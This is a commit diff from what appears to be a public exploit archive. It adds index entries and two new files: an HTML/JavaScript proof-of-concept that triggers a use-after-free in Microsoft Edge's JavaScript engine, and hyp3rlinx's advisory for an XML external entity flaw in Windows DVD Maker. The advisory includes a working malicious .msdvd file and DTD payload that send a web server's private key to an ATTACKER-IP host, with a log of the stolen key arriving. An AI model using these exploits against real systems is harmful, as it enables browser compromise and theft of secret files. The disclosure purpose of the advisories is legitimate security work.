DB: 2017-03-17
2 new exploits Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free Windows DVD Maker 6.1.7 - XML External Entity Injection
This commit is contained in:
parent
66117c63f5
commit
c51cc48e0e
4 changed files with 279 additions and 0 deletions
|
@ -5397,6 +5397,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||||
41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||||
41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
|
41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
|
||||||
|
41623,platforms/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos,0
|
||||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||||
|
@ -8839,6 +8840,7 @@ id,file,description,date,author,platform,type,port
|
||||||
41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0
|
41597,platforms/linux/local/41597.txt,"VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",linux,local,0
|
||||||
41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,windows,local,0
|
41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,windows,local,0
|
||||||
41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0
|
41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0
|
||||||
|
41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0
|
||||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||||
|
|
Can't render this file because it is too large.
|
|
@ -1,3 +1,4 @@
|
||||||
|
/*
|
||||||
source: http://www.securityfocus.com/bid/7294/info
|
source: http://www.securityfocus.com/bid/7294/info
|
||||||
|
|
||||||
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
|
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
|
||||||
|
@ -5,6 +6,7 @@ A buffer overflow vulnerability has been reported for Samba. The problem occurs
|
||||||
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
|
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
|
||||||
|
|
||||||
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
|
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
|
||||||
|
*/
|
||||||
|
|
||||||
/* 0x333hate => samba 2.2.x remote root exploit
|
/* 0x333hate => samba 2.2.x remote root exploit
|
||||||
*
|
*
|
||||||
|
@ -17,6 +19,7 @@ It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samb
|
||||||
*/
|
*/
|
||||||
|
|
||||||
#include <stdio.h>
|
#include <stdio.h>
|
||||||
|
#include <stdlib.h>
|
||||||
#include <unistd.h>
|
#include <unistd.h>
|
||||||
#include <sys/socket.h>
|
#include <sys/socket.h>
|
||||||
#include <sys/types.h>
|
#include <sys/types.h>
|
||||||
|
|
117
platforms/windows/dos/41623.html
Executable file
117
platforms/windows/dos/41623.html
Executable file
|
@ -0,0 +1,117 @@
|
||||||
|
<!--
|
||||||
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1043
|
||||||
|
|
||||||
|
I noticed that some javascript getters behave strangely.
|
||||||
|
|
||||||
|
My test code:
|
||||||
|
|
||||||
|
var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
|
||||||
|
|
||||||
|
var f = document.createElement("iframe");
|
||||||
|
|
||||||
|
f.onload = () => {
|
||||||
|
f.onload = null;
|
||||||
|
|
||||||
|
for (var x in window) {
|
||||||
|
if (whitelist.indexOf(x) != -1)
|
||||||
|
continue;
|
||||||
|
|
||||||
|
try {
|
||||||
|
window.__lookupGetter__(x).call(f.contentWindow);
|
||||||
|
log(x);
|
||||||
|
} catch (e) {
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
};
|
||||||
|
|
||||||
|
f.src = "https://abc.xyz/";
|
||||||
|
document.body.appendChild(f);
|
||||||
|
|
||||||
|
And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.
|
||||||
|
|
||||||
|
Tested on Microsoft Edge 38.14393.0.0.
|
||||||
|
-->
|
||||||
|
|
||||||
|
<!--
|
||||||
|
|
||||||
|
Microsoft Edge: Undefined behavior on some getters
|
||||||
|
|
||||||
|
I noticed that some javascript getters behave strangely.
|
||||||
|
|
||||||
|
My test code:
|
||||||
|
|
||||||
|
var whitelist = ["closed", "document", "frames", "length", "location", "opener", "parent", "self", "top", "window"];
|
||||||
|
|
||||||
|
var f = document.createElement("iframe");
|
||||||
|
|
||||||
|
f.onload = () => {
|
||||||
|
f.onload = null;
|
||||||
|
|
||||||
|
for (var x in window) {
|
||||||
|
if (whitelist.indexOf(x) != -1)
|
||||||
|
continue;
|
||||||
|
|
||||||
|
try {
|
||||||
|
window.__lookupGetter__(x).call(f.contentWindow);
|
||||||
|
log(x);
|
||||||
|
} catch (e) {
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
};
|
||||||
|
|
||||||
|
f.src = "https://abc.xyz/";
|
||||||
|
document.body.appendChild(f);
|
||||||
|
|
||||||
|
And after some plays, finally reached an UAF condition. PoC is attached. RIP will jump into the freed JIT code.
|
||||||
|
|
||||||
|
Tested on Microsoft Edge 38.14393.0.0.
|
||||||
|
|
||||||
|
-->
|
||||||
|
|
||||||
|
|
||||||
|
<pre id="d">
|
||||||
|
</pre>
|
||||||
|
<body></body>
|
||||||
|
|
||||||
|
<script>
|
||||||
|
|
||||||
|
function log(txt) {
|
||||||
|
var c = document.createElement("div");
|
||||||
|
c.innerText = "log: " + txt;
|
||||||
|
d.appendChild(c);
|
||||||
|
}
|
||||||
|
|
||||||
|
function main() {
|
||||||
|
var f = document.createElement("iframe");
|
||||||
|
|
||||||
|
f.onload = () => {
|
||||||
|
f.onload = () => {
|
||||||
|
var status = window.__lookupGetter__("defaultStatus").call(f.contentWindow);
|
||||||
|
var func_cons = status.constructor.constructor;
|
||||||
|
|
||||||
|
var ff = func_cons("return 0x12345;");
|
||||||
|
for (var i = 0; i < 0x100000; i++)
|
||||||
|
ff();
|
||||||
|
|
||||||
|
f.onload = () => {
|
||||||
|
alert("get ready");
|
||||||
|
ff();
|
||||||
|
};
|
||||||
|
|
||||||
|
f.src = "about:blank";
|
||||||
|
};
|
||||||
|
|
||||||
|
//a = f.contentWindow;
|
||||||
|
f.src = "about:blank";
|
||||||
|
};
|
||||||
|
|
||||||
|
document.body.appendChild(f);
|
||||||
|
}
|
||||||
|
|
||||||
|
main();
|
||||||
|
|
||||||
|
</script>
|
157
platforms/windows/local/41619.txt
Executable file
157
platforms/windows/local/41619.txt
Executable file
|
@ -0,0 +1,157 @@
|
||||||
|
[+] Credits: John Page AKA hyp3rlinx
|
||||||
|
[+] Website: hyp3rlinx.altervista.org
|
||||||
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt
|
||||||
|
[+] ISR: ApparitionSec
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vendor:
|
||||||
|
=================
|
||||||
|
www.microsoft.com
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Product:
|
||||||
|
=================
|
||||||
|
Windows DVD Maker
|
||||||
|
v6.1.7
|
||||||
|
|
||||||
|
Windows DVD Maker is a feature you can use to make DVDs that you can watch on a computer or on a TV using a regular DVD player.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Type:
|
||||||
|
=============================
|
||||||
|
XML External Entity Injection
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
CVE Reference:
|
||||||
|
==============
|
||||||
|
CVE-2017-0045
|
||||||
|
MS17-020
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Security issue:
|
||||||
|
================
|
||||||
|
Windows DVD Maker Project ".msdvd" files are prone to XML External Entity attacks allowing remote attackers to gain access
|
||||||
|
to files from a victims computer using a specially crafted malicious .msdvd file, resulting in remote information / file disclosures.
|
||||||
|
|
||||||
|
|
||||||
|
POC URL:
|
||||||
|
=========
|
||||||
|
https://vimeo.com/208383182
|
||||||
|
|
||||||
|
|
||||||
|
References:
|
||||||
|
============
|
||||||
|
https://technet.microsoft.com/library/security/MS17-020
|
||||||
|
https://support.microsoft.com/en-us/help/3208223/ms17-020-security-update-for-windows-dvd-maker-march-14-2017
|
||||||
|
|
||||||
|
Applies to:
|
||||||
|
|
||||||
|
Windows Server 2008 R2 Service Pack 1
|
||||||
|
Windows Server 2008 R2 Datacenter
|
||||||
|
Windows Server 2008 R2 Enterprise
|
||||||
|
Windows Server 2008 R2 Standard
|
||||||
|
Windows Web Server 2008 R2
|
||||||
|
Windows Server 2008 R2 Foundation
|
||||||
|
Windows 7 Service Pack 1
|
||||||
|
Windows 7 Ultimate
|
||||||
|
Windows 7 Enterprise
|
||||||
|
Windows 7 Professional
|
||||||
|
Windows 7 Home Premium
|
||||||
|
Windows 7 Home Basic
|
||||||
|
Windows 7 Starter
|
||||||
|
Windows Server 2008 Service Pack 2
|
||||||
|
Windows Server 2008 Foundation
|
||||||
|
Windows Server 2008 Standard
|
||||||
|
Windows Server 2008 for Itanium-Based Systems
|
||||||
|
Windows Web Server 2008
|
||||||
|
Windows Server 2008 Enterprise
|
||||||
|
Windows Server 2008 Datacenter
|
||||||
|
Windows Vista Service Pack 2
|
||||||
|
Windows Vista Home Basic
|
||||||
|
Windows Vista Home Premium
|
||||||
|
Windows Vista Business
|
||||||
|
Windows Vista Ultimate
|
||||||
|
Windows Vista Enterprise
|
||||||
|
Windows Vista Starter
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Exploit code(s):
|
||||||
|
===============
|
||||||
|
Steal XAMPP Web Servers private key "server.key".
|
||||||
|
|
||||||
|
1) python -m SimpleHTTPServer 8080 (listens on ATTACKER-IP, hosts payload.dtd)
|
||||||
|
|
||||||
|
|
||||||
|
2) "payload.dtd"
|
||||||
|
|
||||||
|
<?xml version="1.0" encoding="UTF-8"?>
|
||||||
|
|
||||||
|
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ATTACKER-IP:8080?%file;'>">
|
||||||
|
|
||||||
|
%all;
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
3) "Evil.msdvd"
|
||||||
|
|
||||||
|
<?xml version="1.0"?>
|
||||||
|
<!DOCTYPE NYHC [
|
||||||
|
<!ENTITY % file SYSTEM "C:\xampp\apache\conf\ssl.key\server.key">
|
||||||
|
<!ENTITY % dtd SYSTEM "http://ATTACKER-IP:8080/payload.dtd">
|
||||||
|
%dtd;]>
|
||||||
|
<pwn>&send;</pwn>
|
||||||
|
|
||||||
|
|
||||||
|
RESULT:
|
||||||
|
XAMPP Web Server private key sent to attacker:
|
||||||
|
|
||||||
|
e.g.
|
||||||
|
|
||||||
|
C:\>python -m SimpleHTTPServer 8080
|
||||||
|
Serving HTTP on 0.0.0.0 port 8080 ...
|
||||||
|
|
||||||
|
127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /payload.dtd HTTP/1.1" 200 -
|
||||||
|
127.0.0.1 - - [13/Mar/2017 23:53:36] "GET /?-----BEGIN%20RSA%20PRIVATE%20KEY-----MIICXQIBAAKBgQDBJdMn4+ytDYNqbedfmnUQI+KQnaBjlY8dQZpY1ZpjjFtzhpB5zMPWo3m4dbwelHx8buOt0CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E
|
||||||
|
ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmkcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh5YQYLKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-----END%20RSA%20PRIVATE%20KEY----- HTTP/1.1" 301 -
|
||||||
|
127.0.0.1 - - [13/Mar/2017 23:53:37] "GET /?-----BEGIN%20RSA%20PRIVATE%20KEY-----MIICXQIBAAKBgQDBJdMn4+ytDYNqbrdfmnUQI+KQnaBjlY8dQZpY1ZxjjFtzhpB5zMPmo4m4dbwelHx8buOt6CdcC8YMavkPMv6zxHoQIwQrKSjUqvmzL2YQ+KfBzWDEayhX42c7957NSCLcOOpIE4A6QJdXDEc1Rj1xYpruU51jDmd6KMmkNP8Z7QIDAQABAoGBAJvUs58McihQrcVRdIoaqPXjrei1c/DEepnFEw03EpzyYdo8KBZM0Xg7q2KKgsM9U45lPQZTNmY6DYh5SgYsQ3dGvocvwndq+wK+QsWH8ngTYqYqwUBBCaX3kwgknAc++EpRRVmV0dJMdXt3xAUKSXnDP9fLPdKXffJoG7C1HHVVAkEA+087rR2FLCjdRq/9WhIT/p2U0RRQnMJyQ74chIJSbeyXg8E
|
||||||
|
ll5QxhSg7skrHSZ0cBPhyaLNDIZkn3NMnK2UqhwJBAMTAsUorHNo4dGpO8y2HE6QXxeuX05OhjiO8H2hmmcuMi2C9OwGIrI+lx1Q8mK261NKJh7sSVwQikh3YQYiKcOsCQQD6YqcChDb7GHvewdmatAhX1ok/Bw6KIPHXrMKdA3s9KkyLaRUbQPtVwBA6Q2brYS1Zhm/3ASQRhZbB3V9ZTSJhAkB772097P5Vr24VcPnZWdbTbG4twwtxWTix5dRa7RY/k55QJ6K9ipw4OBLhSvJZrPBWVm97NUg+wJAOMUXC30ZVAkA6pDgLbxVqkCnNgh2eNzhxQtvEGE4a8yFSUfSktS9UbjAATRYXNv2mAms32aAVKTzgSTapEX9M1OWdk+/yJrJs-----END%20RSA%20PRIVATE%20KEY-----/ HTTP/1.1" 200 -
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Disclosure Timeline:
|
||||||
|
=========================================
|
||||||
|
Vendor Notification: September 3, 2016
|
||||||
|
Vendor acknowledgement: November 17, 2016
|
||||||
|
March 14, 2017 : Vendor released MS17-020
|
||||||
|
March 15, 2017 : Public Disclosure
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Network access:
|
||||||
|
=================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
Severity:
|
||||||
|
===========
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||||
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||||
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||||
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||||
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||||
|
or exploits by the author or elsewhere. All content (c).
|
||||||
|
|
||||||
|
hyp3rlinx
|
Loading…
Add table
Reference in a new issue